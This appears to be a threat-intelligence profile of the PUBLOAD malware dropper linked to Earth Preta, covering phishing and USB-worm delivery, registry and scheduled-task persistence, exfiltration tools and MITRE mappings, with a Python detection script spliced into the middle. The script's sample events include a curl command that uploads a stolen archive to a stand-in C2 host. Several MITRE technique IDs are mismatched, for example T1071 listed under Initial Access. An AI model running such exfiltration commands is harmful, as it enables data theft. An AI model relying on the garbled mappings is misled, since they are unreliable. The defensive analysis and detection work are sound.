| PUBLOAD | |
|---|---|
| Type of Malware | Dropper |
| Country of Origin | China |
| Targeted Countries | United States |
| Date of Initial Activity | 2022 |
| Associated Groups | Mustang Panda |
| Motivation | Cyberwarfare |
| Attack Vectors | Phishing |
| Targeted Systems | Windows |
Overview
PUBLOAD is a sophisticated piece of malware that has been widely associated with the Earth Preta threat group, an advanced persistent threat (APT) actor that has continuously refined its tactics and tools. Recognized for its ability to establish remote access and maintain control over compromised systems, PUBLOAD is often deployed as a first-stage payload, setting the stage for further malicious activities within targeted networks. This malware is central to Earth Preta’s evolving attack strategies, enabling the group to propagate quickly across networks, gather sensitive information, and facilitate further exploitation.
Historically, PUBLOAD has been delivered through spear-phishing campaigns, with attackers using social engineering techniques to trick victims into executing the malicious payload. However, more recent developments show that Earth Preta has diversified its delivery methods, including the use of the HIUPAN worm, a versatile tool that spreads PUBLOAD via removable drives. This evolution in distribution mechanisms highlights the group’s adaptability and its ability to reach networks in ways that bypass traditional security defenses, such as email filters and firewalls.
Targets
Information
How they operate
Delivery and Initial Access
PUBLOAD is commonly delivered through spear-phishing emails that exploit user trust to get the malware onto the victim’s system. However, a more recent and notable method of delivery involves its propagation via a variant of the HIUPAN worm, which spreads through removable drives. Once the worm is executed on a target machine, PUBLOAD is dropped as a secondary payload. This method is particularly effective in environments with limited network monitoring or where removable drives are frequently used, because the malware arrives on physical media and never has to cross network security controls. The HIUPAN worm acts as a precursor, ensuring that PUBLOAD reaches its intended targets.
Execution and Control
Once deployed on the victim machine, PUBLOAD acts as the primary control tool. It performs a variety of functions necessary for the attacker’s control over the infected system. PUBLOAD can execute other malicious payloads, such as RAR for data collection and curl for data exfiltration. The malware runs in the background, allowing attackers to maintain control of the system without detection. Its ability to execute arbitrary commands enables it to serve as a launchpad for further exploitation of the target environment. By leveraging PUBLOAD, attackers can manipulate files, gather sensitive data, and establish a more persistent presence in the system.
Persistence Mechanisms
A key feature of PUBLOAD is its ability to maintain persistence within the infected system. Once installed, it modifies system settings to ensure it remains active even after a reboot. This is achieved by adding entries to the system’s registry and scheduling tasks that enable PUBLOAD to restart automatically. It often installs executables in locations that are unlikely to raise suspicion, such as in the ProgramData directory, and uses techniques like DLL side-loading to hide its presence. These methods allow the malware to evade detection from traditional security tools, making it difficult to remove.
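The execution and persistence behaviours described above (Run-key and scheduled-task persistence, executables staged under ProgramData, DLL side-loading, and rar/curl spawned by the implant for collection and exfiltration) translate into a handful of host-telemetry checks. The following Python is an added example, not code from the original page or from any vendor report; the event records are constructed Sysmon-style samples, and every field name, path and rule name is an assumption.

```python
from typing import Dict, List, Tuple

# Constructed Sysmon-style sample events (not real telemetry); field names and
# paths are assumptions chosen to mirror the behaviours described on the page.
EVENTS: List[Dict[str, str]] = [
    {"type": "registry_set",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\ProgramData\Vendor\update.exe"},
    {"type": "process_create", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\ProgramData\Vendor\update.exe",
     "cmdline": r'schtasks /create /sc onlogon /tn Update /tr "C:\ProgramData\Vendor\update.exe"'},
    {"type": "image_load", "image": r"C:\ProgramData\Vendor\update.exe",
     "loaded": r"C:\ProgramData\Vendor\helper.dll", "dll_signed": "false"},
    {"type": "process_create", "image": r"C:\Windows\System32\curl.exe",
     "parent_image": r"C:\ProgramData\Vendor\update.exe",
     "cmdline": r"curl -T C:\ProgramData\Vendor\out.rar http://c2.example.invalid/up"},
    {"type": "process_create", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},  # benign
]

STAGING_MARKER = "\\programdata\\"           # unusual home for an autostart binary
COLLECTION_TOOLS = {"rar.exe", "curl.exe"}   # named on the page as PUBLOAD's helpers

def in_staging(path: str) -> bool:
    """True when a path points under ProgramData (the staging dir the page cites)."""
    return STAGING_MARKER in path.lower().replace("/", "\\")

def basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]

def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, evidence) pairs for events matching the PUBLOAD patterns."""
    hits: List[Tuple[str, str]] = []
    for e in events:
        kind, cmd = e["type"], e.get("cmdline", "").lower()
        if kind == "registry_set" and "\\currentversion\\run\\" in e["key"].lower() \
                and in_staging(e["value"]):
            hits.append(("run_key_points_to_programdata", e["value"]))
        elif kind == "process_create" and basename(e["image"]) == "schtasks.exe" \
                and "/create" in cmd and in_staging(cmd):
            hits.append(("scheduled_task_points_to_programdata", e["cmdline"]))
        elif kind == "image_load" and in_staging(e["image"]) \
                and in_staging(e["loaded"]) and e.get("dll_signed") == "false":
            hits.append(("possible_dll_sideload", e["loaded"]))  # unsigned DLL beside staged EXE
        elif kind == "process_create" and basename(e["image"]) in COLLECTION_TOOLS \
                and in_staging(e.get("parent_image", "")):
            hits.append(("collection_or_exfil_tool_from_staged_parent", e["image"]))
    return hits
```

Each rule alone is noisy on a busy fleet; the value is in the same staged executable showing up across the Run key, the scheduled task, the side-loaded DLL and the parent of curl/rar within a short window.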
Supplemental Tools and Lateral Movement
PUBLOAD is often used in conjunction with other tools to extend the capabilities of the attackers. For instance, tools like FDMTP and PTSOCKET are deployed as secondary control and exfiltration tools. FDMTP is used to manage file transfers, while PTSOCKET allows for alternative exfiltration methods. These tools enable attackers to bypass network defenses and maintain flexibility in their communication with command-and-control (C2) servers. Through these tools, PUBLOAD enables attackers to conduct lateral movement within the network, allowing them to expand their reach and compromise additional systems. This makes the attack more dynamic and harder to contain.
Data Exfiltration and Escalation
The ultimate goal of PUBLOAD is often to facilitate data exfiltration. Through its various tools, it can silently collect sensitive information from the infected system and send it to the attackers. PTSOCKET, for example, can be used to transfer stolen data over encrypted channels, making it difficult to detect and prevent. This stealthy exfiltration method enables attackers to gather critical data such as intellectual property, government secrets, or personally identifiable information (PII). Furthermore, PUBLOAD can assist in privilege escalation within the compromised environment, allowing attackers to gain higher access levels and further extend the scope of their operations.
Conclusion
PUBLOAD is a highly effective malware that serves as a critical tool in advanced cyberattacks. By leveraging multiple delivery methods, execution techniques, persistence mechanisms, and supplementary tools, it enables attackers to maintain control over infected systems, move laterally within networks, and exfiltrate valuable data. Its ability to remain undetected and operate covertly makes it a powerful weapon in the arsenal of cybercriminals and state-sponsored actors alike. Understanding how PUBLOAD works on a technical level is crucial for organizations to defend against its threats, implement effective detection measures, and improve their overall cybersecurity posture.
MITRE Tactics and Techniques
Initial Access (T1071)
PUBLOAD is often delivered through spear-phishing campaigns or via the propagation of a variant of the HIUPAN worm using removable drives. This tactic allows the malware to gain an initial foothold in a target system, often by exploiting user trust or by leveraging physical media to bypass network-based defenses.
Execution (T1203)
Once the malware is delivered, PUBLOAD executes on the victim’s machine, establishing the attacker’s ability to run arbitrary commands and control the infected system. This can involve triggering payloads or executing downloaded components, such as RAR for collection or curl for exfiltration.
Persistence (T1547)
To maintain persistence on the infected system, PUBLOAD modifies the registry, creates scheduled tasks, or installs new executables to ensure it continues running even after a system reboot. This tactic is essential for attackers to maintain long-term access to compromised networks.
Privilege Escalation (T1078)
In certain cases, PUBLOAD may be used to escalate privileges on the infected system, allowing the attacker to gain higher-level access for further control. This can involve bypassing security mechanisms or exploiting vulnerabilities to perform actions with administrative privileges.
Command and Control (T1071)
PUBLOAD utilizes command-and-control (C2) communication mechanisms to facilitate communication between the infected machine and the attacker’s infrastructure. This enables attackers to issue commands, exfiltrate data, and deploy additional malicious tools or payloads.
Exfiltration (T1041)
PUBLOAD facilitates data exfiltration by deploying tools such as FDMTP or PTSOCKET, which can be used to send stolen data out of the target environment. These tools are designed to operate covertly, making detection of data transfer activities more difficult.
Lateral Movement (T1075)
By leveraging additional tools introduced by PUBLOAD, attackers can move laterally within the network, accessing other systems and expanding the reach of their attack. This tactic allows them to escalate the scope of their operations and further infiltrate sensitive data sources.